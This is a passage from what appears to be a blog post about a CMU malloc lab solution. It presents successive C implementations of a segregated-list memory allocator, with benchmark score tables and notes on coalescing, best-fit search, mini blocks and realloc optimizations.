* mm_init - initialize the malloc package.
*/
int mm_init(void)
{
if ((heap_listp = mem_sbrk(4 * SWORD)) == (void *)-1)
return -1;
PUT(heap_listp, 0);
PUT(heap_listp + 1 * SWORD, PACK(DWORD, 1 << 1, 1));
PUT(heap_listp + 2 * SWORD, PACK(DWORD, 1 << 1, 1));
PUT(heap_listp + 3 * SWORD, PACK(0, 1 << 1, 1));
heap_listp += 2 * SWORD;

if (extend_heap(CHUNKSIZE / SWORD) == NULL)
return -1;
return 0;
}

/*
* mm_malloc - Allocate a block by incrementing the brk pointer.
* Always allocate a block whose size is a multiple of the alignment.
*/
void* mm_malloc(size_t size)
{
size_t asize;
size_t extendsize;
char* bp;

if (size == 0)
return NULL;

if (size <= 3 * SWORD)
asize = 2 * DWORD;
else
asize = DWORD * ((size + SWORD + DWORD - 1) / DWORD);

if ((bp = find_fit(asize)) != NULL) {
place (bp, asize);
return bp;
}

extendsize = MAX(asize, CHUNKSIZE);
if ((bp = extend_heap(extendsize / SWORD)) == NULL)
return NULL;
place(bp, asize);
return bp;
}

/*
* mm_free - Freeing a block does nothing.
*/
void mm_free(void *bp)
{
size_t size = GET_SIZE(HDRP(bp));
size_t prev_alloc = GET_ALLOC_PREV(HDRP(bp));
PUT(HDRP(bp), PACK(size, prev_alloc, 0));
PUT(FTRP(bp), PACK(size, prev_alloc, 0));

set_nextblock_alloc_prev(bp, 0);
}

/*
* mm_realloc - Implemented simply in terms of mm_malloc and mm_free
*/
void* mm_realloc(void* bp, size_t size)
{
if (bp == NULL)
return mm_malloc(size);

if (size == 0) {
mm_free(bp);
return NULL;
}

size_t osize = GET_SIZE(HDRP(bp));
size_t asize = size <= 3 * SWORD ? 2 * DWORD : DWORD * ((size + SWORD + DWORD - 1) / DWORD);

if (osize >= asize + 2 * DWORD) {
void* old_bp = bp;
PUT(HDRP(bp), PACK(asize, GET_ALLOC_PREV(HDRP(bp)), 1));
bp = NEXT_BLKP(bp);
PUT(HDRP(bp), PACK(osize - asize, 1 << 1, 0));
PUT(FTRP(bp), PACK(osize - asize, 1 << 1, 0));
set_nextblock_alloc_prev(bp, 0);
return old_bp;
}
else if (osize >= asize) {
return bp;
}
else {
void* new_bp = mm_malloc(size);
if (new_bp == NULL)
return NULL;

memcpy(new_bp, bp, osize - SWORD);
mm_free(bp);
return new_bp;
}
}

Utility seems to be marginally better but the throughput is terribly bad. We must turn to some more efficient allocating data structures.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
trace  valid  util     ops      secs  Kops
0 yes 99% 5694 0.004449 1280
1 yes 99% 5848 0.004395 1331
2 yes 99% 6648 0.007329 907
3 yes 100% 5380 0.005301 1015
4 yes 66% 14400 0.000058249567
5 yes 95% 4800 0.005649 850
6 yes 94% 4800 0.005361 895
7 yes 55% 12000 0.056433 213
8 yes 51% 24000 0.181652 132
9 yes 31% 14401 0.026830 537
10 yes 30% 14401 0.000816 17655
11 yes 77% 57716 0.965589 60
12 yes 78% 100000 1.950844 51
13 yes 99% 20000 0.000813 24585
14 yes 71% 200400 0.104944 1910
15 yes 58% 6495 0.014209 457
Total 75% 496983 3.334673 149

Perf index = 45 (util) + 10 (thru) = 55/100

Explicit + Deferred Coalesce + Better Hit

We then replace the implicit linked list with an explicit linked list, also with deferred coalesce and a better hit strategy to find a free block. Better hit means that when the first valid free block is hit, we then search the next free blocks and select the smallest valid free block. is set to by default.

The final score is 69 for this version. A significant improvement, but still not enough.

Seglist + Deferred Coalesce + Better Hit

To further improve utility and throughput, we must employ the segregate linked list. The lists are partitioned according to their sizes: . Deferred coalesce and better hit are still used.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <unistd.h>
#include <string.h>

#include "mm.h"
#include "memlib.h"

team_t team = {
/* Team name */
"Goodbye",
/* First member's full name */
"Sulley",
/* First member's email address */
"sulley@cs.cmu.edu",
/* Second member's full name (leave blank if none) */
"AnotherSulley",
/* Second member's email address (leave blank if none) */
"anothersulley@cs.cmu.edu"
};

/* single word (4) or double word (8) alignment */
#define DWORD 8
#define SWORD 4

/* rounds up to the nearest multiple of DWORD */
#define ALIGN(size) (((size) + (DWORD-1)) & ~0x7)

/* Aligned size_t */
#define SIZE_T_SIZE (ALIGN(sizeof(size_t)))

/* Extend heap by this amount */
#define CHUNKSIZE (1<<12)

/* Return max */
#define MAX(x, y) ((x) > (y) ? (x) : (y))

/* Pack a size and allocated bits into a word */
#define PACK(size, alloc_prev, alloc) ((size) | (alloc_prev) | (alloc))

/* Read and write a double word at address p */
#define GET(p) (*(unsigned int*)(p))
#define PUT(p, val) (*(unsigned int*)(p) = (val))

/* Read the size and allocated fields from address p */
#define GET_SIZE(p) (GET(p) & ~0x7)
#define GET_ALLOC(p) (GET(p) & 0x1)
#define GET_ALLOC_PREV(p) (GET(p) & 0x2)

/* Given block ptr, compute the address of its header and footer */
#define HDRP(bp) ((char *)(bp) - SWORD)
#define FTRP(bp) ((char *)(bp) + GET_SIZE(HDRP(bp)) - DWORD)

/* Get and set a free block's next/prev pointer value */
#define GET_PRVP(bp) (*((unsigned int*)(bp) + 1))
#define GET_NXTP(bp) (*(unsigned int*)(bp))
#define PUT_PRVP(bp, v) (*((unsigned int*)(bp) + 1) = (v))
#define PUT_NXTP(bp, v) (*(unsigned int*)(bp) = (v))


/* Given block ptr bp, compute address of next and previous qblocks */
#define NEXT_BLKP(bp) ((char *)(bp) + GET_SIZE(HDRP(bp)))
#define PREV_BLKP(bp) ((char *)(bp) - GET_SIZE(((char *)(bp) - DWORD)))

#define N_SEGLIST 20

const unsigned int lower_seg[N_SEGLIST] = { 0, 1 << 4, 1 << 5, 1 << 6, 1 << 7, 1 << 8, 1 << 9, 1 << 10, 1 << 11, 1 << 12, 1 << 13, 1 << 14, 1 << 15, 1 << 16, 1 << 17, 1 << 18, 1 << 19, 1 << 20, 1 << 21, 1 << 22 };
const unsigned int upper_seg[N_SEGLIST] = { 1 << 4, 1 << 5, 1 << 6, 1 << 7, 1 << 8, 1 << 9, 1 << 10, 1 << 11, 1 << 12, 1 << 13, 1 << 14, 1 << 15, 1 << 16, 1 << 17, 1 << 18, 1 << 19, 1 << 20, 1 << 21, 1 << 22, 1 << 32 - 1 };
static char* head_seglp[N_SEGLIST];
static char* heap_listp = NULL;

static size_t find_segidx(size_t size)
{
if (size <= 16)
return 0;

if (size > 1 << 22)
return 19;

size_t mask, seg_idx = 0;
size_t x = size - 1;

mask = x & 0xFFFF0000;
seg_idx = seg_idx + !!mask * 16;
x = x >> (!!mask * 16);

mask = x & 0x0000FF00;
seg_idx = seg_idx + !!mask * 8;
x = x >> (!!mask * 8);

mask = x & 0x000000F0;
seg_idx = seg_idx + !!mask * 4;
x = x >> (!!mask * 4);

mask = x & 0x0000000C;
seg_idx = seg_idx + !!mask * 2;
x = x >> (!!mask * 2);

mask = x & 0x00000002;
seg_idx = seg_idx + !!mask * 1;
x = x >> (!!mask * 1);

mask = x & 0x00000001;
seg_idx = seg_idx + !!mask;

return MAX(0, seg_idx - 4);
}

static size_t insert_freeblock(void* bp)
{
size_t seg_idx = find_segidx(GET_SIZE(HDRP(bp)));
void* nxtp = head_seglp[seg_idx];

head_seglp[seg_idx] = bp;
PUT_PRVP(bp, NULL);
PUT_NXTP(bp, nxtp);
if (nxtp != NULL)
PUT_PRVP(nxtp, bp);

return seg_idx;
}

static void delete_freeblock(void* bp)
{
size_t seg_idx = find_segidx(GET_SIZE(HDRP(bp)));
void* prvp = GET_PRVP(bp);
void* nxtp = GET_NXTP(bp);
if (prvp != NULL) PUT_NXTP(prvp, nxtp);
if (nxtp != NULL) PUT_PRVP(nxtp, prvp);
if (head_seglp[seg_idx] == bp)
head_seglp[seg_idx] = nxtp;
}

static void set_nextblock_alloc_prev(void* bp, size_t value)
{
bp = NEXT_BLKP(bp);
PUT(HDRP(bp), PACK(GET_SIZE(HDRP(bp)), value, GET_ALLOC(HDRP(bp))));
}


// This function returns the prev free block in the same seg list as `bp`
static void* coalesce(void *bp)
{
size_t prev_alloc = GET_ALLOC_PREV(HDRP(bp));
size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
size_t size = GET_SIZE(HDRP(bp));
size_t seg_idx = find_segidx (size);

if (prev_alloc && next_alloc) { }

else if (prev_alloc && !next_alloc) {
void* nxtp = NEXT_BLKP(bp);
void* prev_freep = GET_PRVP(bp);

// Make sure the prev free block is not the ones we're coalescing
if (prev_freep == nxtp)
prev_freep = GET_PRVP(prev_freep);

delete_freeblock(bp);
delete_freeblock(nxtp);
size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
PUT(HDRP(bp), PACK(size, 1 << 1, 0));
PUT(FTRP(bp), PACK(size, 1 << 1, 0));
size_t new_segidx = insert_freeblock(bp);

// Set bp that will be returned to ensure it's still in the same seg list
if (new_segidx == seg_idx || prev_freep == NULL) {
bp = head_seglp[seg_idx];
} else {
bp = prev_freep;
}
}

else if (!prev_alloc && next_alloc) {
void* nxtp = bp;
void* prev_freep = GET_PRVP(bp);
bp = PREV_BLKP(bp);

// Make sure the prev free block is not the ones we're coalescing
if (prev_freep == bp) {
prev_freep = GET_PRVP(prev_freep);
}

delete_freeblock(bp);
delete_freeblock(nxtp);
size += GET_SIZE(HDRP(bp));
PUT(HDRP(bp), PACK(size, GET_ALLOC_PREV(HDRP(bp)), 0));
PUT(FTRP(bp), PACK(size, GET_ALLOC_PREV(HDRP(bp)), 0));
size_t new_segidx = insert_freeblock(bp);

if (new_segidx == seg_idx || prev_freep == NULL) {
bp = head_seglp[seg_idx];
} else {
bp = prev_freep;
}
}

else {
size += GET_SIZE(HDRP(PREV_BLKP(bp))) + GET_SIZE(HDRP(NEXT_BLKP(bp)));
void* nxtp = bp;
void* nnxtp = NEXT_BLKP(bp);
void* prev_freep = GET_PRVP(bp);
bp = PREV_BLKP(bp);

// Make sure the prev free block is not the ones we're coalescing
while (prev_freep == bp || prev_freep == nnxtp) {
prev_freep = GET_PRVP(prev_freep);
}

delete_freeblock(bp);
delete_freeblock(nxtp);
delete_freeblock(nnxtp);
PUT(HDRP(bp), PACK(size, GET_ALLOC_PREV(HDRP(bp)), 0));
PUT(FTRP(bp), PACK(size, GET_ALLOC_PREV(HDRP(bp)), 0));
size_t new_segidx = insert_freeblock(bp);

if (new_segidx == seg_idx || prev_freep == NULL) {
bp = head_seglp[seg_idx];
} else {
bp = prev_freep;
}
}

return bp;
}

static void* find_fit_better_hit_seglist_deferred(size_t asize)
{
size_t seg_idx = find_segidx(asize);
void* bp;
void* best_bp = NULL;
void* best_size = 0;
const int iteration = 100;

while (seg_idx < N_SEGLIST) {
bp = head_seglp[seg_idx];
while (bp != NULL) {
if (!GET_ALLOC(HDRP(NEXT_BLKP(bp))) || !GET_ALLOC_PREV(HDRP(bp))) {
bp = coalesce(bp);
continue;
}
if (asize <= GET_SIZE(HDRP(bp))) {
best_bp = bp;
best_size = GET_SIZE(HDRP(bp));
break;
}
bp = GET_NXTP(bp);
}
if (best_bp != NULL)
break;
seg_idx++;
}

return best_bp;

if (best_bp == NULL || seg_idx == N_SEGLIST)
return NULL;

size_t i = 0;
while (i < iteration && bp != NULL) {
// Coalesce
while (!GET_ALLOC(HDRP(NEXT_BLKP(bp))) || !GET_ALLOC_PREV(HDRP(bp))) {
bp = coalesce(bp);
continue;
}

// Check if it's better
++i;
if (asize <= GET_SIZE(HDRP(bp)) && GET_SIZE(HDRP(bp)) < best_size) {
best_bp = bp;
best_size = GET_SIZE(HDRP(bp));
}

// Next free block
bp = GET_NXTP(bp);
}

return best_bp;
}

static void* find_fit(size_t asize)
{
void* bp = find_fit_better_hit_seglist_deferred(asize);
return bp;
}

static void place(void* bp, size_t asize)
{
size_t csize = GET_SIZE(HDRP(bp));
if (csize >= asize + 2 * DWORD) {
delete_freeblock(bp);
PUT(HDRP(bp), PACK(asize, GET_ALLOC_PREV(HDRP(bp)), 1));
bp = NEXT_BLKP(bp);
PUT(HDRP(bp), PACK(csize - asize, 1 << 1, 0));
PUT(FTRP(bp), PACK(csize - asize, 1 << 1, 0));
insert_freeblock(bp);
}
else {
delete_freeblock(bp);
PUT(HDRP(bp), PACK(csize, GET_ALLOC_PREV(HDRP(bp)), 1));
set_nextblock_alloc_prev(bp, 1 << 1);
}
}

static void* extend_heap(size_t words)
{
char *bp;
size_t size;

size = (words % 2) ? (words + 1) * SWORD : words * SWORD;
if ((long)(bp = mem_sbrk(size)) == -1)
return NULL;
size_t prev_alloc = GET_ALLOC_PREV(HDRP(bp));
PUT(HDRP(bp), PACK(size, prev_alloc, 0));
PUT(FTRP(bp), PACK(size, prev_alloc, 0));
PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 0, 1));

insert_freeblock(bp);
return bp;
}

/*
* mm_init - initialize the malloc package.
*/
int mm_init(void)
{
void* bp;

if ((heap_listp = mem_sbrk(4 * SWORD)) == (void *)-1)
return -1;
PUT(heap_listp, 0);
PUT(heap_listp + 1 * SWORD, PACK(DWORD, 1 << 1, 1));
PUT(heap_listp + 2 * SWORD, PACK(DWORD, 1 << 1, 1));
PUT(heap_listp + 3 * SWORD, PACK(0, 1 << 1, 1));
heap_listp += 2 * SWORD;

for (int i = 0; i < N_SEGLIST; ++i)
head_seglp[i] = NULL;

if ((bp = extend_heap(CHUNKSIZE / SWORD)) == NULL)
return -1;
return 0;
}

/*
* mm_malloc - Allocate a block by incrementing the brk pointer.
* Always allocate a block whose size is a multiple of the alignment.
*/
void* mm_malloc(size_t size)
{
size_t asize;
size_t extendsize;
char* bp;

if (size == 0)
return NULL;

if (size <= 3 * SWORD)
asize = 2 * DWORD;
else
asize = DWORD * ((size + SWORD + DWORD - 1) / DWORD);

if ((bp = find_fit(asize)) != NULL) {
place (bp, asize);
return bp;
}

extendsize = MAX(asize, CHUNKSIZE);
if ((bp = extend_heap(extendsize / SWORD)) == NULL)
return NULL;
place(bp, asize);
return bp;
}

/*
* mm_free - Freeing a block does nothing.
*/
void mm_free(void *bp)
{
size_t size = GET_SIZE(HDRP(bp));
size_t prev_alloc = GET_ALLOC_PREV(HDRP(bp));
PUT(HDRP(bp), PACK(size, prev_alloc, 0));
PUT(FTRP(bp), PACK(size, prev_alloc, 0));
set_nextblock_alloc_prev(bp, 0);
insert_freeblock(bp);
}

/*
* mm_realloc - Implemented simply in terms of mm_malloc and mm_free
*/

void* mm_realloc(void* bp, size_t size)
{
if (bp == NULL)
return mm_malloc(size);

if (size == 0) {
mm_free(bp);
return NULL;
}

size_t osize = GET_SIZE(HDRP(bp));
size_t asize = size <= 3 * SWORD ? 2 * DWORD : DWORD * ((size + SWORD + DWORD - 1) / DWORD);

if (osize >= asize + 2 * DWORD) {
void* old_bp = bp;
PUT(HDRP(bp), PACK(asize, GET_ALLOC_PREV(HDRP(bp)), 1));
bp = NEXT_BLKP(bp);
PUT(HDRP(bp), PACK(osize - asize, 1 << 1, 0));
PUT(FTRP(bp), PACK(osize - asize, 1 << 1, 0));
set_nextblock_alloc_prev(bp, 0);
insert_freeblock(bp);
return old_bp;
}
else if (osize >= asize) {
return bp;
}
else {
void* new_bp = mm_malloc(size);
if (new_bp == NULL)
return NULL;

memcpy(new_bp, bp, osize - SWORD);
mm_free(bp);
return new_bp;
}
}

and the score is...

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
trace  valid  util     ops      secs  Kops
0 yes 99% 5694 0.000104 54540
1 yes 99% 5848 0.000102 57333
2 yes 99% 6648 0.000123 53917
3 yes 99% 5380 0.000114 47028
4 yes 40% 14400 0.000346 41667
5 yes 92% 4800 0.000175 27491
6 yes 90% 4800 0.000206 23346
7 yes 52% 12000 0.000124 96852
8 yes 51% 24000 0.000248 96774
9 yes 20% 14401 0.027726 519
10 yes 31% 14401 0.000967 14889
11 yes 77% 57716 0.000616 93649
12 yes 51% 100000 0.001141 87665
13 yes 99% 20000 0.000283 70746
14 yes 71% 200400 0.003631 55193
15 yes 53% 6495 0.000077 83806
Total 70% 496983 0.035983 13811

Perf index = 42 (util) + 40 (thru) = 82/100

Excellent! We get a very decent score: a good score of utility and a full score of throughput. But there are still much room to improve utility.

Seglist + Immediate Coalesce + Better Hit + Mini Block + Realloc Optimization + Place Optimization

We did the following optimizations on top of the basic seglist:

  • Immediate Coalesce: Deferred coalescing does not seem to improve utility so a simpler immediate coalesce is employed.
  • Better Hit: Starting from the first hit we further search the next 100 free blocks and choose the most fittable one.
  • Mini Block: Shrink the minimum block size to 8 bytes rather than 16 bytes. This can be achieved by introducing an extra bit to store whether the previous block is a mini block. This is applied for both free blocks and allocated blocks.
  • Realloc Optimization: If we cannot find an existing free block during reallocation, and at the same time the block reallocated lies at the end of the heap, we then extend the size we need rather than the full size. For example, if the current block occupies 800 bytes and the new size is 960 bytes, we only need to extend the heap for 160 bytes, not 960 bytes.
  • Place Optimization: When splitting a free block, we place the allocated block at the end of the free block if it's size is larger than a threshold (set to 64 by default) and place it at the front otherwise. This sometimes helps coalesce and reduce fragmentation.

Experiments show that the last two techniques are critical to improve utility whereas the first three have marginal effects.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <unistd.h>
#include <string.h>

#include "mm.h"
#include "memlib.h"

team_t team = {
/* Team name */
"Goodbye",
/* First member's full name */
"Sulley",
/* First member's email address */
"sulley@cs.cmu.edu",
/* Second member's full name (leave blank if none) */
"AnotherSulley",
/* Second member's email address (leave blank if none) */
"anothersulley@cs.cmu.edu"
};

/* single word (4) or double word (8) alignment */
#define DWORD 8
#define SWORD 4

/* rounds up to the nearest multiple of DWORD */
#define ALIGN(size) (((size) + (DWORD-1)) & ~0x7)

/* Aligned size_t */
#define SIZE_T_SIZE (ALIGN(sizeof(size_t)))

/* Extend heap by this amount */
#define CHUNKSIZE (1<<9)

/* Return max */
#define MAX(x, y) ((x) > (y) ? (x) : (y))
#define MIN(x, y) ((x) < (y) ? (x) : (y))

/* Pack a size and allocated bits into a word */
#define PACK(size, prev_mini, prev_alloc, alloc) ((size) | (prev_mini) | (prev_alloc) | (alloc))

/* Read and write a double word at address p */
#define GET(p) (*(unsigned int*)(p))
#define PUT(p, val) (*(unsigned int*)(p) = (val))

/* Read the size and allocated fields from address p */
#define GET_SIZE(p) (GET(p) & ~0x7)
#define GET_ALLOC(p) (GET(p) & 0x1)
#define GET_PREV_ALLO(p) (GET(p) & 0x2)
#define GET_PREV_MINI(p) (GET(p) & 0x4)

/* Given block ptr, compute the address of its header and footer */
#define HDRP(bp) ((char *)(bp) - SWORD)
#define FTRP(bp) ((char *)(bp) + GET_SIZE(HDRP(bp)) - DWORD)

/* Get and set a free block's next/prev pointer value */
#define GET_PRVP(bp) (*((unsigned int*)(bp) + 1))
#define GET_NXTP(bp) (*(unsigned int*)(bp))
#define PUT_PRVP(bp, v) (*((unsigned int*)(bp) + 1) = (v))
#define PUT_NXTP(bp, v) (*(unsigned int*)(bp) = (v))


/* Given block ptr bp, compute address of next and previous qblocks */
#define NEXT_BLKP(bp) ((char *)(bp) + GET_SIZE(HDRP(bp)))
#define PREV_BLKP(bp) ((char *)(bp) - GET_SIZE(((char *)(bp) - DWORD)))

#define N_SEGLIST 21

const unsigned int lower_seg[N_SEGLIST] = { 0, 1 << 3, 1 << 4, 1 << 5, 1 << 6, 1 << 7, 1 << 8, 1 << 9, 1 << 10, 1 << 11, 1 << 12, 1 << 13, 1 << 14, 1 << 15, 1 << 16, 1 << 17, 1 << 18, 1 << 19, 1 << 20, 1 << 21, 1 << 22 };
const unsigned int upper_seg[N_SEGLIST] = { 1 << 3, 1 << 4, 1 << 5, 1 << 6, 1 << 7, 1 << 8, 1 << 9, 1 << 10, 1 << 11, 1 << 12, 1 << 13, 1 << 14, 1 << 15, 1 << 16, 1 << 17, 1 << 18, 1 << 19, 1 << 20, 1 << 21, 1 << 22, 1 << 32 - 1 };
static char* head_seglp[N_SEGLIST];
static char* heap_listp = NULL;

static size_t find_segidx(size_t size)
{
if (size <= 8)
return 0;

if (size > 1 << 22)
return 20;

size_t mask, seg_idx = 0;
size_t x = size - 1;

mask = x & 0xFFFF0000;
seg_idx = seg_idx + !!mask * 16;
x = x >> (!!mask * 16);

mask = x & 0x0000FF00;
seg_idx = seg_idx + !!mask * 8;
x = x >> (!!mask * 8);

mask = x & 0x000000F0;
seg_idx = seg_idx + !!mask * 4;
x = x >> (!!mask * 4);

mask = x & 0x0000000C;
seg_idx = seg_idx + !!mask * 2;
x = x >> (!!mask * 2);

mask = x & 0x00000002;
seg_idx = seg_idx + !!mask * 1;
x = x >> (!!mask * 1);

mask = x & 0x00000001;
seg_idx = seg_idx + !!mask;

return MAX(0, seg_idx - 3);
}

static size_t insert_freeblock(void* bp)
{
size_t seg_idx = find_segidx(GET_SIZE(HDRP(bp)));
void* nxtp = head_seglp[seg_idx];

// Mini block, using LIFO
if (seg_idx == 0) {
head_seglp[0] = bp;
PUT_NXTP(bp, nxtp);
return 0;
}

if (nxtp == NULL) {
head_seglp[seg_idx] = bp;
PUT_PRVP(bp, NULL);
PUT_NXTP(bp, NULL);
}
else {
void* curp = nxtp;
nxtp = GET_NXTP(nxtp);
while (nxtp != NULL && nxtp < bp) {
curp = nxtp;
nxtp = GET_NXTP(nxtp);
}
if (nxtp == NULL) {
PUT_NXTP(curp, bp);
PUT_PRVP(bp, curp);
PUT_NXTP(bp, NULL);
}
else {
PUT_NXTP(curp, bp);
PUT_PRVP(bp, curp);
PUT_NXTP(bp, nxtp);
PUT_PRVP(nxtp, bp);
}
}

return seg_idx;
}

static void delete_freeblock(void* bp)
{
size_t seg_idx = find_segidx(GET_SIZE(HDRP(bp)));

// Mini block
if (seg_idx == 0) {
if (head_seglp[0] == bp) {
head_seglp[0] = GET_NXTP(bp);
}
else {
void* curp = head_seglp[0];
void* nxtp = GET_NXTP(curp);
while (!(nxtp == bp)) {
curp = nxtp;
nxtp = GET_NXTP(nxtp);
}
PUT_NXTP(curp, GET_NXTP(nxtp));
}
return;
}

void* prvp = GET_PRVP(bp);
void* nxtp = GET_NXTP(bp);
if (prvp != NULL) PUT_NXTP(prvp, nxtp);
if (nxtp != NULL) PUT_PRVP(nxtp, prvp);
if (head_seglp[seg_idx] == bp)
head_seglp[seg_idx] = nxtp;
}

static void set_nextblock_alloc_prev(void* bp, size_t value)
{
bp = NEXT_BLKP(bp);
PUT(HDRP(bp), PACK(GET_SIZE(HDRP(bp)), GET_PREV_MINI(HDRP(bp)), value, GET_ALLOC(HDRP(bp))));
}

static void set_nextblock_mini_prev(void* bp, size_t mini)
{
bp = NEXT_BLKP(bp);
PUT(HDRP(bp), PACK(GET_SIZE(HDRP(bp)), mini, GET_PREV_ALLO(HDRP(bp)), GET_ALLOC(HDRP(bp))));
}

static void* coalesce(void *bp)
{
size_t prev_alloc = GET_PREV_ALLO(HDRP(bp));
size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
size_t size = GET_SIZE(HDRP(bp));

if (prev_alloc && next_alloc) { }

else if (prev_alloc && !next_alloc) {
void* nxtp = NEXT_BLKP(bp);
set_nextblock_mini_prev(nxtp, 0);
delete_freeblock(bp);
delete_freeblock(nxtp);
size += GET_SIZE(HDRP(nxtp));
PUT(HDRP(bp), PACK(size, GET_PREV_MINI(HDRP(bp)), 1 << 1, 0));
PUT(FTRP(bp), PACK(size, GET_PREV_MINI(HDRP(bp)), 1 << 1, 0));
insert_freeblock(bp);
}

else if (!prev_alloc && next_alloc) {
set_nextblock_mini_prev(bp, 0);
void* nxtp = bp;
bp = GET_PREV_MINI(HDRP(bp)) ? bp - DWORD : PREV_BLKP(bp);
delete_freeblock(bp);
delete_freeblock(nxtp);
size += GET_SIZE(HDRP(bp));
PUT(HDRP(bp), PACK(size, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 0));
PUT(FTRP(bp), PACK(size, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 0));
insert_freeblock(bp);
}

else {
void* nxtp = bp;
void* nnxtp = NEXT_BLKP(bp);
set_nextblock_mini_prev(nnxtp, 0);
bp = GET_PREV_MINI(HDRP(bp)) ? bp - DWORD : PREV_BLKP(bp);
delete_freeblock(bp);
delete_freeblock(nxtp);
delete_freeblock(nnxtp);
size += GET_SIZE(HDRP(bp)) + GET_SIZE(HDRP(nnxtp));
PUT(HDRP(bp), PACK(size, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 0));
PUT(FTRP(bp), PACK(size, GET_PREV_MINI(HDRP(bp)), GET_PREV_ALLO(HDRP(bp)), 0));
insert_freeblock(bp);
}

return bp;
}

// Coalesce neighboring free blocks (if any) for realloc.
static void* coalesce_realloc(void* bp)
{
size_t size = GET_SIZE(HDRP(bp));

// Merge following free blocks
void* current_bp = bp;
while (!GET_ALLOC(HDRP(NEXT_BLKP(current_bp)))) {
current_bp = NEXT_BLKP(current_bp);
delete_freeblock(current_bp);
size += GET_SIZE(HDRP(current_bp));
}

// Merge prior free blocks
current_bp = bp;
size_t prev_alloc = GET_PREV_ALLO(HDRP(current_bp));
while (!prev_alloc) {
current_bp = GET_PREV_MINI(HDRP(bp)) ? current_bp - DWORD : PREV_BLKP(current_bp);
delete_freeblock(current_bp);
size += GET_SIZE(HDRP(current_bp));
prev_alloc = GET_PREV_ALLO(HDRP(current_bp));
}

PUT(HDRP(current_bp), PACK(size, GET_PREV_MINI(HDRP(bp)), prev_alloc, 0));
size_t mini = size > DWORD ? 0 : 1 << 2;
set_nextblock_mini_prev(current_bp, mini);

return current_bp;
}

static void* find_fit_better_hit_seglist_immediate(size_t asize)
{
size_t seg_idx = find_segidx(asize);
void* bp;
void* best_bp = NULL;
size_t best_size = 0;
const int iteration = 100;

// Mini block
if (seg_idx == 0) {
bp = head_seglp[0];
if (bp != NULL)
return bp;
else
